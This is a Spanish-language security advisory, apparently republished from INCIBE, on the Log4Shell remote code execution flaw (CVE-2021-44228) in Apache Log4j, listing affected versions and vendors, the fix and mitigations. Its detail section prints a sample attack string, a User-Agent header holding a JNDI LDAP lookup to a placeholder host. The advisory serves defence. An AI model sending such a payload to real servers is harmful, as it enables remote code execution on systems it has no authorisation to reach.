Log4Shell: vulnerabilidad 0day de ejecución remota de código en Apache Log4j

Fecha de publicación: 13/12/2021

Importancia:
Crítica

Recursos afectados:

Están afectados todos los productos que utilizan la librería Log4j2 de Apache, desde la versión 2.0-beta9 hasta la versión 2.14.1. Esta librería es utilizada en muchos productos, tanto comerciales como en desarrollos propios basados en Java.

Entre los fabricantes que integran esta librería en sus productos, o lo están evaluando, destacan:

  • Apache Solr, puede consultar la lista de productos afectados en su página web;
  • Apache Struts, puede consultar la lista de productos afectados en su página web;
  • Atlassian, puede consultar la lista de productos afectados en su página web;
  • BMC, puede consultar la lista de productos afectados en su página web;
  • Cisco, puede consultar la lista de productos afectados en su página web;
  • Citrix, puede consultar la lista de productos afectados en su página web;
  • Debian, puede consultar la lista de productos afectados en su página web;
  • Docker, puede consultar la lista de productos afectados en su página web;
  • F-Secure, puede consultar la lista de productos afectados en su página web;
  • Fortinet, puede consultar la lista de productos afectados en su página web;
  • RedHat, puede consultar la lista de productos afectados en su página web;
  • Solarwinds, puede consultar la lista de productos afectados en su página web;
  • VMware, puede consultar la lista de productos afectados en su página web.

El investigador SwitHak mantiene una lista con otros productos afectados.

Descripción:

Chen Zhaojun, investigador de Alibaba Cloud Security Team, ha descubierto una vulnerabilidad 0day crítica, que se ha denominado Log4Shell, que podría ser explotada por un atacante remoto no autenticado para ejecutar código arbitrario (RCE).

La vulnerabilidad afecta a Apache Log4j, una biblioteca open source desarrollada por Apache Software Foundation que facilita a aplicaciones del ecosistema Java mantener un registro de actividades realizadas en tiempo de ejecución, por la que millones de usuarios de cientos de servicios online podrían verse potencialmente afectados.

Solución:

Actualizar Apache Log4j a la versión 2.15.0.

Como medidas de mitigación, en versiones anteriores (>=2.10) este comportamiento puede mitigarse estableciendo la propiedad del sistema:

log4j2.formatMsgNoLookups = true

o eliminando la clase JndiLookup del classpath, como por ejemplo:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Java 8u121 protege contra esta RCE al establecer por defecto:

com.sun.jndi.rmi.object.trustURLCodebase = false

com.sun.jndi.cosnaming.object.trustURLCodebase = false

Adicionalmente, aplicar las medidas de mitigación descritas en los avisos de fabricantes afectados.

Detalle:

La vulnerabilidad se origina de la forma en que los mensajes de registro son gestionados por el procesador Log4j. Si un atacante envía un mensaje especialmente diseñado:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Podría resultar en la carga de una clase de código externo o la búsqueda de mensajes y la ejecución de ese código, lo que llevaría a una RCE. Se ha asignado el identificador CVE-2021-44228 para esta vulnerabilidad.

Debido a que algunas funciones de Apache Log4j tienen funciones de análisis recursivas, los atacantes podrían construir directamente peticiones maliciosas para desencadenar vulnerabilidades de ejecución remota de código.

Esta vulnerabilidad podría estar explotándose de manera activa.

Encuesta valoración

Etiquetas:
0day, Actualización, Apache, Cisco, Infraestructuras críticas, Java, Microsoft, Oracle, VMware, Vulnerabilidad

Ir a la fuente
Author: INCIBE
Aviso: Esta noticia / aviso es únicamente informativa y su veracidad está supeditada a la fuente origen. TechConsulting muestra este contenido por creer en su fuente y cómo servicio para facilitar a usuarios y empresas la obtención de dicho contenido. Agradecemos a la fuente el esfuerzo por distribuir este tipo de noticias y avisos sobre Ciberseguridad.